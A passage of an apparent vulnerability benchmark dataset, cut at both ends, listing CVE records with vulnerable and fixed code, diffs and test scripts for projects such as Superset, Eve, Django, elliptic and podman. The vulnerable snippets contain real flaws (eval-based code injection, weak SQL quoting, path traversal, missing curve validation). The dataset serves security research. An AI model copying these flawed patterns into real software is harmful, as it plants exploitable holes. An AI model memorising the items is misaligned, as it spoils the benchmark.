"lib/mime-node/index.js", "start_line": 1140, "end_line": 1168, "snippet": " _convertAddresses(addresses, uniqueList) {\n let values = [];\n\n uniqueList = uniqueList || [];\n\n [].concat(addresses || []).forEach(address => {\n if (address.address) {\n address.address = this._normalizeAddress(address.address);\n\n if (!address.name) {\n values.push(address.address);\n } else if (address.name) {\n values.push(this._encodeAddressName(address.name) + ' <' + address.address + '>');\n }\n\n if (address.address) {\n if (!uniqueList.filter(a => a.address === address.address).length) {\n uniqueList.push(address);\n }\n }\n } else if (address.group) {\n values.push(\n this._encodeAddressName(address.name) + ':' + (address.group.length ? this._convertAddresses(address.group, uniqueList) : '').trim() + ';'\n );\n }\n });\n\n return values.join(', ');\n }"}, {"id": "vul_js_137_2", "commit": "1750c0f", "file_path": "lib/mime-node/index.js", "start_line": 1176, "end_line": 1193, "snippet": " _normalizeAddress(address) {\n address = (address || '').toString().trim();\n\n let lastAt = address.lastIndexOf('@');\n if (lastAt < 0) {\n // Bare username\n return address;\n }\n let user = address.substr(0, lastAt);\n let domain = address.substr(lastAt + 1);\n\n // Usernames are not touched and are kept as is even if these include unicode\n // Domains are punycoded by default\n // 'j\\u00f5geva.ee' will be converted to 'xn--jgeva-dua.ee'\n // non-unicode domains are left as is\n\n return user + '@' + punycode.toASCII(domain.toLowerCase());\n }"}], "fix_func": [{"id": "fix_js_137_1", "commit": "7e02648", "file_path": "lib/mime-node/index.js", "start_line": 1140, "end_line": 1167, "snippet": " _convertAddresses(addresses, uniqueList) {\n let values = [];\n\n uniqueList = uniqueList || [];\n\n [].concat(addresses || []).forEach(address => {\n if (address.address) {\n address.address = this._normalizeAddress(address.address);\n\n if (!address.name) {\n values.push(address.address.indexOf(' ') >= 0 ? `<${address.address}>` : `${address.address}`);\n } else if (address.name) {\n values.push(`${this._encodeAddressName(address.name)} <${address.address}>`);\n }\n\n if (address.address) {\n if (!uniqueList.filter(a => a.address === address.address).length) {\n uniqueList.push(address);\n }\n }\n } else if (address.group) {\n let groupListAddresses = (address.group.length ? 
this._convertAddresses(address.group, uniqueList) : '').trim();\n values.push(`${this._encodeAddressName(address.name)}:${groupListAddresses};`);\n }\n });\n\n return values.join(', ');\n }"}, {"id": "fix_js_137_2", "commit": "7e02648", "file_path": "lib/mime-node/index.js", "start_line": 1175, "end_line": 1213, "snippet": " _normalizeAddress(address) {\n address = (address || '')\n .toString()\n .replace(/[\\x00-\\x1F<>]+/g, ' ') // remove unallowed characters\n .trim();\n\n let lastAt = address.lastIndexOf('@');\n if (lastAt < 0) {\n // Bare username\n return address;\n }\n\n let user = address.substr(0, lastAt);\n let domain = address.substr(lastAt + 1);\n\n // Usernames are not touched and are kept as is even if these include unicode\n // Domains are punycoded by default\n // 'j\\u00f5geva.ee' will be converted to 'xn--jgeva-dua.ee'\n // non-unicode domains are left as is\n\n let encodedDomain;\n\n try {\n encodedDomain = punycode.toASCII(domain.toLowerCase());\n } catch (err) {\n // keep as is?\n }\n\n if (user.indexOf(' ') >= 0) {\n if (user.charAt(0) !== '\"') {\n user = '\"' + user;\n }\n if (user.substr(-1) !== '\"') {\n user = user + '\"';\n }\n }\n\n return `${user}@${encodedDomain}`;\n }"}], "vul_patch": "--- a/lib/mime-node/index.js\n+++ b/lib/mime-node/index.js\n@@ -8,9 +8,9 @@\n address.address = this._normalizeAddress(address.address);\n \n if (!address.name) {\n- values.push(address.address);\n+ values.push(address.address.indexOf(' ') >= 0 ? `<${address.address}>` : `${address.address}`);\n } else if (address.name) {\n- values.push(this._encodeAddressName(address.name) + ' <' + address.address + '>');\n+ values.push(`${this._encodeAddressName(address.name)} <${address.address}>`);\n }\n \n if (address.address) {\n@@ -19,9 +19,8 @@\n }\n }\n } else if (address.group) {\n- values.push(\n- this._encodeAddressName(address.name) + ':' + (address.group.length ? this._convertAddresses(address.group, uniqueList) : '').trim() + ';'\n- );\n+ let groupListAddresses = (address.group.length ? 
this._convertAddresses(address.group, uniqueList) : '').trim();\n+ values.push(`${this._encodeAddressName(address.name)}:${groupListAddresses};`);\n }\n });\n \n\n--- a/lib/mime-node/index.js\n+++ b/lib/mime-node/index.js\n@@ -1,11 +1,15 @@\n _normalizeAddress(address) {\n- address = (address || '').toString().trim();\n+ address = (address || '')\n+ .toString()\n+ .replace(/[\\x00-\\x1F<>]+/g, ' ') // remove unallowed characters\n+ .trim();\n \n let lastAt = address.lastIndexOf('@');\n if (lastAt < 0) {\n // Bare username\n return address;\n }\n+\n let user = address.substr(0, lastAt);\n let domain = address.substr(lastAt + 1);\n \n@@ -14,5 +18,22 @@\n // 'j\\u00f5geva.ee' will be converted to 'xn--jgeva-dua.ee'\n // non-unicode domains are left as is\n \n- return user + '@' + punycode.toASCII(domain.toLowerCase());\n+ let encodedDomain;\n+\n+ try {\n+ encodedDomain = punycode.toASCII(domain.toLowerCase());\n+ } catch (err) {\n+ // keep as is?\n+ }\n+\n+ if (user.indexOf(' ') >= 0) {\n+ if (user.charAt(0) !== '\"') {\n+ user = '\"' + user;\n+ }\n+ if (user.substr(-1) !== '\"') {\n+ user = user + '\"';\n+ }\n+ }\n+\n+ return `${user}@${encodedDomain}`;\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-49736", "cve_description": "A where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement\u00a0would allow for SQL injection\u00a0in Apache Superset.This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2.\n\nUsers are recommended to upgrade to version 3.0.2, which fixes the issue.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. 
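The Superset `where_in` record that begins here turns on a single design choice: the vulnerable macro let the caller pick the quote character (`mark`) and then escaped by doubling it, so a crafted mark combined with a crafted value defeats the escaping entirely. The patched `WhereInMacro` instead asks the database dialect to render each value as a literal bind parameter. Below is a minimal Python sketch of that approach, using the same SQLAlchemy calls the record's fix uses; the function name and the MySQL default are illustrative, not part of the record:

```python
from sqlalchemy import bindparam
from sqlalchemy.dialects import mysql

def safe_where_in(values, dialect=None):
    """Render an IN-list by letting the dialect escape each literal.

    Unlike the vulnerable macro, there is no caller-supplied quote
    character: escaping is delegated entirely to SQLAlchemy.
    """
    dialect = dialect or mysql.dialect()
    binds = [bindparam(f"value_{i}", v) for i, v in enumerate(values)]
    rendered = [
        str(b.compile(dialect=dialect, compile_kwargs={"literal_binds": True}))
        for b in binds
    ]
    return f"({', '.join(rendered)})"

print(safe_where_in([1, "Joe's", 3]))  # (1, 'Joe''s', 3)
```

Delegating escaping to the dialect also keeps the output correct across backends, since each dialect knows its own quoting rules; the caller never gets to influence them.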
Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/apache/superset", "patch_url": ["https://github.com/apache/superset/commit/1d403dab9822a8cee6108669c53e53fad881c751", "https://github.com/apache/superset/commit/34101594e284ab3acce692f41aff7759ccb4bf1d"], "programing_language": "Python", "vul_func": [{"id": "vul_py_19_1", "commit": "2f46890", "file_path": "superset/jinja_context.py", "start_line": 400, "end_line": 416, "snippet": "def where_in(values: list[Any], mark: str = \"'\") -> str:\n \"\"\"\n Given a list of values, build a parenthesis list suitable for an IN expression.\n\n >>> where_in([1, \"b\", 3])\n (1, 'b', 3)\n\n \"\"\"\n\n def quote(value: Any) -> str:\n if isinstance(value, str):\n value = value.replace(mark, mark * 2)\n return f\"{mark}{value}{mark}\"\n return str(value)\n\n joined_values = \", \".join(quote(value) for value in values)\n return f\"({joined_values})\""}, {"id": "vul_py_19_2", "commit": "2f46890", "file_path": "superset/jinja_context.py", "start_line": 427, "end_line": 452, "snippet": " def __init__(\n self,\n database: \"Database\",\n query: Optional[\"Query\"] = None,\n table: Optional[\"SqlaTable\"] = None,\n extra_cache_keys: Optional[list[Any]] = None,\n removed_filters: Optional[list[str]] = None,\n applied_filters: Optional[list[str]] = None,\n **kwargs: Any,\n ) -> None:\n self._database = database\n self._query = query\n self._schema = None\n if query and query.schema:\n self._schema = query.schema\n elif table:\n self._schema = table.schema\n self._extra_cache_keys = extra_cache_keys\n self._applied_filters = applied_filters\n self._removed_filters = removed_filters\n self._context: dict[str, Any] = {}\n self._env = SandboxedEnvironment(undefined=DebugUndefined)\n self.set_context(**kwargs)\n\n # custom filters\n self._env.filters[\"where_in\"] = where_in"}], "fix_func": [{"id": "fix_py_19_1", "commit": "1d403da", "file_path": "superset/jinja_context.py", "start_line": 401, "end_line": 433, "snippet": "class WhereInMacro: # pylint: disable=too-few-public-methods\n def __init__(self, dialect: Dialect):\n self.dialect = dialect\n\n def __call__(self, values: list[Any], mark: Optional[str] = None) -> str:\n \"\"\"\n Given a list of values, build a parenthesis list suitable for an IN expression.\n\n >>> from sqlalchemy.dialects import mysql\n >>> where_in = WhereInMacro(dialect=mysql.dialect())\n >>> where_in([1, \"Joe's\", 3])\n (1, 'Joe''s', 3)\n\n \"\"\"\n binds = [bindparam(f\"value_{i}\", value) for i, value in enumerate(values)]\n string_representations = [\n str(\n bind.compile(\n dialect=self.dialect, compile_kwargs={\"literal_binds\": True}\n )\n )\n for bind in binds\n ]\n joined_values = \", \".join(string_representations)\n result = f\"({joined_values})\"\n\n if mark:\n result += (\n \"\\n-- WARNING: the `mark` parameter was removed from the `where_in` \"\n \"macro for security reasons\\n\"\n )\n\n return result"}, {"id": "fix_py_19_2", "commit": "1d403da", "file_path": "superset/jinja_context.py", "start_line": 444, "end_line": 469, "snippet": " def __init__(\n self,\n database: \"Database\",\n query: Optional[\"Query\"] = None,\n table: Optional[\"SqlaTable\"] = None,\n extra_cache_keys: Optional[list[Any]] = None,\n removed_filters: Optional[list[str]] = None,\n applied_filters: Optional[list[str]] = None,\n **kwargs: Any,\n ) -> None:\n self._database = database\n 
self._query = query\n self._schema = None\n if query and query.schema:\n self._schema = query.schema\n elif table:\n self._schema = table.schema\n self._extra_cache_keys = extra_cache_keys\n self._applied_filters = applied_filters\n self._removed_filters = removed_filters\n self._context: dict[str, Any] = {}\n self._env = SandboxedEnvironment(undefined=DebugUndefined)\n self.set_context(**kwargs)\n\n # custom filters\n self._env.filters[\"where_in\"] = WhereInMacro(database.get_dialect())"}], "vul_patch": "--- a/superset/jinja_context.py\n+++ b/superset/jinja_context.py\n@@ -1,17 +1,33 @@\n-def where_in(values: list[Any], mark: str = \"'\") -> str:\n- \"\"\"\n- Given a list of values, build a parenthesis list suitable for an IN expression.\n+class WhereInMacro: # pylint: disable=too-few-public-methods\n+ def __init__(self, dialect: Dialect):\n+ self.dialect = dialect\n \n- >>> where_in([1, \"b\", 3])\n- (1, 'b', 3)\n+ def __call__(self, values: list[Any], mark: Optional[str] = None) -> str:\n+ \"\"\"\n+ Given a list of values, build a parenthesis list suitable for an IN expression.\n \n- \"\"\"\n+ >>> from sqlalchemy.dialects import mysql\n+ >>> where_in = WhereInMacro(dialect=mysql.dialect())\n+ >>> where_in([1, \"Joe's\", 3])\n+ (1, 'Joe''s', 3)\n \n- def quote(value: Any) -> str:\n- if isinstance(value, str):\n- value = value.replace(mark, mark * 2)\n- return f\"{mark}{value}{mark}\"\n- return str(value)\n+ \"\"\"\n+ binds = [bindparam(f\"value_{i}\", value) for i, value in enumerate(values)]\n+ string_representations = [\n+ str(\n+ bind.compile(\n+ dialect=self.dialect, compile_kwargs={\"literal_binds\": True}\n+ )\n+ )\n+ for bind in binds\n+ ]\n+ joined_values = \", \".join(string_representations)\n+ result = f\"({joined_values})\"\n \n- joined_values = \", \".join(quote(value) for value in values)\n- return f\"({joined_values})\"\n+ if mark:\n+ result += (\n+ \"\\n-- WARNING: the `mark` parameter was removed from the `where_in` \"\n+ \"macro for security reasons\\n\"\n+ )\n+\n+ return result\n\n--- a/superset/jinja_context.py\n+++ b/superset/jinja_context.py\n@@ -23,4 +23,4 @@\n self.set_context(**kwargs)\n \n # custom filters\n- self._env.filters[\"where_in\"] = where_in\n+ self._env.filters[\"where_in\"] = WhereInMacro(database.get_dialect())\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2023-49736:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/superset\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2023-49736/bin/python -m pytest tests/unit_tests/jinja_context_test.py::test_where_in -v\n", "unit_test_cmd": null} {"cve_id": "CVE-2018-8097", "cve_description": "io/mongo/parser.py in Eve (aka pyeve) before 0.7.5 allows remote attackers to execute arbitrary code via Code Injection in the where parameter.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the 
intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/pyeve/eve", "patch_url": ["https://github.com/pyeve/eve/commit/f8f7019ffdf9b4e05faf95e1f04e204aa4c91f98"], "programing_language": "Python", "vul_func": [{"id": "vul_py_221_1", "commit": "6d1526b", "file_path": "eve/io/mongo/parser.py", "start_line": 120, "end_line": 134, "snippet": " def visit_Call(self, node):\n \"\"\" A couple function calls are supported: bson's ObjectId() and\n datetime().\n \"\"\"\n if isinstance(node.func, ast.Name):\n expr = None\n if node.func.id == 'ObjectId':\n expr = \"('\" + node.args[0].s + \"')\"\n elif node.func.id == 'datetime':\n values = []\n for arg in node.args:\n values.append(str(arg.n))\n expr = \"(\" + \", \".join(values) + \")\"\n if expr:\n self.current_value = eval(node.func.id + expr)"}], "fix_func": [{"id": "fix_py_221_1", "commit": "f8f7019", "file_path": "eve/io/mongo/parser.py", "start_line": 120, "end_line": 137, "snippet": " def visit_Call(self, node):\n \"\"\" A couple function calls are supported: bson's ObjectId() and\n datetime().\n \"\"\"\n if isinstance(node.func, ast.Name):\n if node.func.id == 'ObjectId':\n try:\n self.current_value = ObjectId(node.args[0].s)\n except:\n pass\n elif node.func.id == 'datetime':\n values = []\n for arg in node.args:\n values.append(arg.n)\n try:\n self.current_value = datetime(*values)\n except:\n pass"}], "vul_patch": "--- a/eve/io/mongo/parser.py\n+++ b/eve/io/mongo/parser.py\n@@ -3,13 +3,16 @@\n datetime().\n \"\"\"\n if isinstance(node.func, ast.Name):\n- expr = None\n if node.func.id == 'ObjectId':\n- expr = \"('\" + node.args[0].s + \"')\"\n+ try:\n+ self.current_value = ObjectId(node.args[0].s)\n+ except:\n+ pass\n elif node.func.id == 'datetime':\n values = []\n for arg in node.args:\n- values.append(str(arg.n))\n- expr = \"(\" + \", \".join(values) + \")\"\n- if expr:\n- self.current_value = eval(node.func.id + expr)\n+ values.append(arg.n)\n+ try:\n+ self.current_value = datetime(*values)\n+ except:\n+ pass\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-39330", "cve_description": "An issue was discovered in Django 5.0 before 5.0.7 and 4.2 before 4.2.14. Derived classes of the django.core.files.storage.Storage base class, when they override generate_filename() without replicating the file-path validations from the parent class, potentially allow directory traversal via certain inputs during a save() call. 
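The Django record above (CVE-2024-39330) comes down to a missing re-validation step: `Storage.save()` trusted whatever name `get_available_name()` and an overridden `generate_filename()` produced, so a subclass that skipped the parent's checks reintroduced traversal. A stdlib-only sketch of the validation the patch applies both before and after the name can change follows; the exception class is a stand-in for Django's, and the function name is illustrative:

```python
import os
import pathlib

class SuspiciousFileOperation(Exception):
    """Stand-in for Django's exception of the same name."""

def check_relative_upload_name(name: str) -> str:
    """Reject absolute paths and '..' segments in a storage-relative name.

    Mirrors the checks the patched save() applies around
    get_available_name(), so an overridden generate_filename()
    can no longer smuggle a traversal through.
    """
    if os.path.basename(name) in {"", ".", ".."}:
        raise SuspiciousFileOperation(f"Could not derive file name from {name!r}")
    # Treat backslashes as separators too, as the hardened fix does.
    path = pathlib.PurePosixPath(str(name).replace("\\", "/"))
    if path.is_absolute() or ".." in path.parts:
        raise SuspiciousFileOperation(f"Detected path traversal attempt in {name!r}")
    return name

check_relative_upload_name("avatars/me.png")       # returns the name unchanged
# check_relative_upload_name("../../etc/passwd")   # raises SuspiciousFileOperation
```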
(Built-in Storage sub-classes are unaffected.)", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/django/django", "patch_url": ["https://github.com/django/django/commit/9f4f63e9ebb7bf6cb9547ee4e2526b9b96703270", "https://github.com/django/django/commit/2b00edc0151a660d1eb86da4059904a0fc4e095e"], "programing_language": "Python", "vul_func": [{"id": "vul_py_4_1", "commit": "156d318", "file_path": "django/core/files/storage/base.py", "start_line": 24, "end_line": 41, "snippet": " def save(self, name, content, max_length=None):\n \"\"\"\n Save new content to the file specified by name. The content should be\n a proper File object or any Python file-like object, ready to be read\n from the beginning.\n \"\"\"\n # Get the proper name for the file, as it will actually be saved.\n if name is None:\n name = content.name\n\n if not hasattr(content, \"chunks\"):\n content = File(content, name)\n\n name = self.get_available_name(name, max_length=max_length)\n name = self._save(name, content)\n # Ensure that the name returned from the storage system is still valid.\n validate_file_name(name, allow_relative_path=True)\n return name"}, {"id": "vul_py_4_2", "commit": "156d318", "file_path": "django/core/files/utils.py", "start_line": 7, "end_line": 24, "snippet": "def validate_file_name(name, allow_relative_path=False):\n # Remove potentially dangerous names\n if os.path.basename(name) in {\"\", \".\", \"..\"}:\n raise SuspiciousFileOperation(\"Could not derive file name from '%s'\" % name)\n\n if allow_relative_path:\n # Use PurePosixPath() because this branch is checked only in\n # FileField.generate_filename() where all file paths are expected to be\n # Unix style (with forward slashes).\n path = pathlib.PurePosixPath(name)\n if path.is_absolute() or \"..\" in path.parts:\n raise SuspiciousFileOperation(\n \"Detected path traversal attempt in '%s'\" % name\n )\n elif name != os.path.basename(name):\n raise SuspiciousFileOperation(\"File name '%s' includes path elements\" % name)\n\n return name"}], "fix_func": [{"id": "fix_py_4_1", "commit": "2b00edc0151a660d1eb86da4059904a0fc4e095e", "file_path": "django/core/files/storage/base.py", "start_line": 24, "end_line": 52, "snippet": " def save(self, name, content, max_length=None):\n \"\"\"\n Save new content to the file specified by name. The content should be\n a proper File object or any Python file-like object, ready to be read\n from the beginning.\n \"\"\"\n # Get the proper name for the file, as it will actually be saved.\n if name is None:\n name = content.name\n\n if not hasattr(content, \"chunks\"):\n content = File(content, name)\n\n # Ensure that the name is valid, before and after having the storage\n # system potentially modifying the name. 
This duplicates the check made\n # inside `get_available_name` but it's necessary for those cases where\n # `get_available_name` is overriden and validation is lost.\n validate_file_name(name, allow_relative_path=True)\n\n # Potentially find a different name depending on storage constraints.\n name = self.get_available_name(name, max_length=max_length)\n # Validate the (potentially) new name.\n validate_file_name(name, allow_relative_path=True)\n\n # The save operation should return the actual name of the file saved.\n name = self._save(name, content)\n # Ensure that the name returned from the storage system is still valid.\n validate_file_name(name, allow_relative_path=True)\n return name"}, {"id": "fix_py_4_2", "commit": "2b00edc0151a660d1eb86da4059904a0fc4e095e", "file_path": "django/core/files/utils.py", "start_line": 7, "end_line": 23, "snippet": "def validate_file_name(name, allow_relative_path=False):\n # Remove potentially dangerous names\n if os.path.basename(name) in {\"\", \".\", \"..\"}:\n raise SuspiciousFileOperation(\"Could not derive file name from '%s'\" % name)\n\n if allow_relative_path:\n # Ensure that name can be treated as a pure posix path, i.e. Unix\n # style (with forward slashes).\n path = pathlib.PurePosixPath(str(name).replace(\"\\\\\", \"/\"))\n if path.is_absolute() or \"..\" in path.parts:\n raise SuspiciousFileOperation(\n \"Detected path traversal attempt in '%s'\" % name\n )\n elif name != os.path.basename(name):\n raise SuspiciousFileOperation(\"File name '%s' includes path elements\" % name)\n\n return name"}], "vul_patch": "--- a/django/core/files/storage/base.py\n+++ b/django/core/files/storage/base.py\n@@ -11,7 +11,18 @@\n if not hasattr(content, \"chunks\"):\n content = File(content, name)\n \n+ # Ensure that the name is valid, before and after having the storage\n+ # system potentially modifying the name. This duplicates the check made\n+ # inside `get_available_name` but it's necessary for those cases where\n+ # `get_available_name` is overriden and validation is lost.\n+ validate_file_name(name, allow_relative_path=True)\n+\n+ # Potentially find a different name depending on storage constraints.\n name = self.get_available_name(name, max_length=max_length)\n+ # Validate the (potentially) new name.\n+ validate_file_name(name, allow_relative_path=True)\n+\n+ # The save operation should return the actual name of the file saved.\n name = self._save(name, content)\n # Ensure that the name returned from the storage system is still valid.\n validate_file_name(name, allow_relative_path=True)\n\n--- a/django/core/files/utils.py\n+++ b/django/core/files/utils.py\n@@ -4,10 +4,9 @@\n raise SuspiciousFileOperation(\"Could not derive file name from '%s'\" % name)\n \n if allow_relative_path:\n- # Use PurePosixPath() because this branch is checked only in\n- # FileField.generate_filename() where all file paths are expected to be\n- # Unix style (with forward slashes).\n- path = pathlib.PurePosixPath(name)\n+ # Ensure that name can be treated as a pure posix path, i.e. 
Unix\n+ # style (with forward slashes).\n+ path = pathlib.PurePosixPath(str(name).replace(\"\\\\\", \"/\"))\n if path.is_absolute() or \"..\" in path.parts:\n raise SuspiciousFileOperation(\n \"Detected path traversal attempt in '%s'\" % name\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-39330:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd tests && /workspace/PoC_env/CVE-2024-39330/bin/python ./runtests.py file_storage.test_base file_storage.tests.FileStorageTests.test_file_save_broken_symlink file_uploads.tests.DirectoryCreationTests.test_not_a_directory", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-39330:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/django\ngit apply --whitespace=nowarn /workspace/fix.patch /workspace/dep.patch\ncd tests && /workspace/PoC_env/CVE-2024-39330/bin/python ./runtests.py file_storage.tests file_uploads.tests"} {"cve_id": "CVE-2020-28498", "cve_description": "The package elliptic before 6.5.4 are vulnerable to Cryptographic Issues via the secp256k1 implementation in elliptic/ec/key.js. There is no check to confirm that the public key point passed into the derive function actually exists on the secp256k1 curve. This results in the potential for the private key used in this implementation to be revealed after a number of ECDH operations are performed.", "cwe_info": {"CWE-327": {"name": "Use of a Broken or Risky Cryptographic Algorithm", "description": "The product uses a broken or risky cryptographic algorithm or protocol."}}, "repo": "https://github.com/indutny/elliptic", "patch_url": ["https://github.com/indutny/elliptic/commit/441b7428b0e8f6636c42118ad2aaa186d3c34c3f"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_233_1", "commit": "e71b2d9", "file_path": "lib/elliptic/ec/key.js", "start_line": 102, "end_line": 104, "snippet": "KeyPair.prototype.derive = function derive(pub) {\n return pub.mul(this.priv).getX();\n};"}], "fix_func": [{"id": "fix_js_233_1", "commit": "441b7428b0e8f6636c42118ad2aaa186d3c34c3f", "file_path": "lib/elliptic/ec/key.js", "start_line": 102, "end_line": 108, "snippet": "KeyPair.prototype.derive = function derive(pub) {\n if(!pub.validate()) {\n assert(pub.validate(), 'public point not validated');\n }\n return pub.mul(this.priv).getX();\n};\n"}], "vul_patch": "--- a/lib/elliptic/ec/key.js\n+++ b/lib/elliptic/ec/key.js\n@@ -1,3 +1,6 @@\n KeyPair.prototype.derive = function derive(pub) {\n+ if(!pub.validate()) {\n+ assert(pub.validate(), 'public point not validated');\n+ }\n return pub.mul(this.priv).getX();\n };\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-10856", "cve_description": "It has been discovered that podman before version 0.6.1 does not drop capabilities when executing a container as a non-root user. 
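The elliptic record just above (CVE-2020-28498) is the classic invalid-curve problem: `derive()` multiplied the private scalar by a peer-supplied point without confirming the point lies on secp256k1, and the one-line fix is exactly that membership check. The check itself is just the curve equation; here is a self-contained Python sketch, where the constants are secp256k1's published parameters rather than anything taken from the library:

```python
# secp256k1 parameters (public constants)
P = 2**256 - 2**32 - 977   # field prime
A, B = 0, 7                # curve: y^2 = x^3 + 7

def is_on_curve(x: int, y: int) -> bool:
    """Return True iff (x, y) satisfies the curve equation mod P.

    An ECDH implementation should refuse a peer point that fails this
    check (or is the point at infinity) before multiplying it by the
    private scalar; otherwise invalid-curve points can leak key bits
    over repeated exchanges.
    """
    return (y * y - (x * x * x + A * x + B)) % P == 0

# Sanity check: the standard generator point G must validate.
Gx = 0x79BE667EF9DCBBAC55A06295CE870B07029BFCDB2DCE28D959F2815B16F81798
Gy = 0x483ADA7726A3C4655DA4FBFC0E1108A8FD17B448A68554199C47D08FFB10D4B8
assert is_on_curve(Gx, Gy)
```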
This results in unnecessary privileges being granted to the container.", "cwe_info": {"CWE-732": {"name": "Incorrect Permission Assignment for Critical Resource", "description": "The product specifies permissions for a security-critical resource in a way that allows that resource to be read or modified by unintended actors."}}, "repo": "https://github.com/projectatomic/libpod", "patch_url": ["https://github.com/projectatomic/libpod/commit/bae80a0b663925ec751ad2784ca32989403cdc24"], "programing_language": "Go", "vul_func": [{"id": "vul_go_213_1", "commit": "e6b088f", "file_path": "pkg/spec/spec.go", "start_line": 390, "end_line": 403, "snippet": "func setupCapabilities(config *CreateConfig, configSpec *spec.Spec) error {\n\tvar err error\n\tvar caplist []string\n\tcaplist, err = caps.TweakCapabilities(configSpec.Process.Capabilities.Bounding, config.CapAdd, config.CapDrop)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tconfigSpec.Process.Capabilities.Bounding = caplist\n\tconfigSpec.Process.Capabilities.Permitted = caplist\n\tconfigSpec.Process.Capabilities.Inheritable = caplist\n\tconfigSpec.Process.Capabilities.Effective = caplist\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_213_1", "commit": "bae80a0b663925ec751ad2784ca32989403cdc24", "file_path": "pkg/spec/spec.go", "start_line": 391, "end_line": 422, "snippet": "\tuseNotRoot := func(user string) bool {\n\t\tif user == \"\" || user == \"root\" || user == \"0\" {\n\t\t\treturn false\n\t\t}\n\t\treturn true\n\t}\n\n\tvar err error\n\tvar caplist []string\n\tbounding := configSpec.Process.Capabilities.Bounding\n\tif useNotRoot(config.User) {\n\t\tconfigSpec.Process.Capabilities.Bounding = caplist\n\t}\n\tcaplist, err = caps.TweakCapabilities(configSpec.Process.Capabilities.Bounding, config.CapAdd, config.CapDrop)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tconfigSpec.Process.Capabilities.Bounding = caplist\n\tconfigSpec.Process.Capabilities.Permitted = caplist\n\tconfigSpec.Process.Capabilities.Inheritable = caplist\n\tconfigSpec.Process.Capabilities.Effective = caplist\n\tconfigSpec.Process.Capabilities.Ambient = caplist\n\tif useNotRoot(config.User) {\n\t\tcaplist, err = caps.TweakCapabilities(bounding, config.CapAdd, config.CapDrop)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tconfigSpec.Process.Capabilities.Bounding = caplist\n\treturn nil\n}"}], "vul_patch": "--- a/pkg/spec/spec.go\n+++ b/pkg/spec/spec.go\n@@ -1,6 +1,16 @@\n-func setupCapabilities(config *CreateConfig, configSpec *spec.Spec) error {\n+\tuseNotRoot := func(user string) bool {\n+\t\tif user == \"\" || user == \"root\" || user == \"0\" {\n+\t\t\treturn false\n+\t\t}\n+\t\treturn true\n+\t}\n+\n \tvar err error\n \tvar caplist []string\n+\tbounding := configSpec.Process.Capabilities.Bounding\n+\tif useNotRoot(config.User) {\n+\t\tconfigSpec.Process.Capabilities.Bounding = caplist\n+\t}\n \tcaplist, err = caps.TweakCapabilities(configSpec.Process.Capabilities.Bounding, config.CapAdd, config.CapDrop)\n \tif err != nil {\n \t\treturn err\n@@ -10,5 +20,13 @@\n \tconfigSpec.Process.Capabilities.Permitted = caplist\n \tconfigSpec.Process.Capabilities.Inheritable = caplist\n \tconfigSpec.Process.Capabilities.Effective = caplist\n+\tconfigSpec.Process.Capabilities.Ambient = caplist\n+\tif useNotRoot(config.User) {\n+\t\tcaplist, err = caps.TweakCapabilities(bounding, config.CapAdd, config.CapDrop)\n+\t\tif err != nil {\n+\t\t\treturn err\n+\t\t}\n+\t}\n+\tconfigSpec.Process.Capabilities.Bounding = caplist\n \treturn nil\n }\n\n", "poc_patch": null, "unit_test_cmd": 
null} {"cve_id": "CVE-2020-26236", "cve_description": "In ScratchVerifier before commit a603769, an attacker can hijack the verification process to log into someone else's account on any site that uses ScratchVerifier for logins. A possible exploitation would follow these steps: 1. User starts login process. 2. Attacker attempts login for user, and is given the same verification code. 3. User comments code as part of their normal login. 4. Before user can, attacker completes the login process now that the code is commented. 5. User gets a failed login and attacker now has control of the account. Since commit a603769 starting a login twice will generate different verification codes, causing both user and attacker login to fail. For clients that rely on a clone of ScratchVerifier not hosted by the developers, their users may attempt to finish the login process as soon as possible after commenting the code. There is no reliable way for the attacker to know before the user can finish the process that the user has commented the code, so this vulnerability only really affects those who comment the code and then take several seconds before finishing the 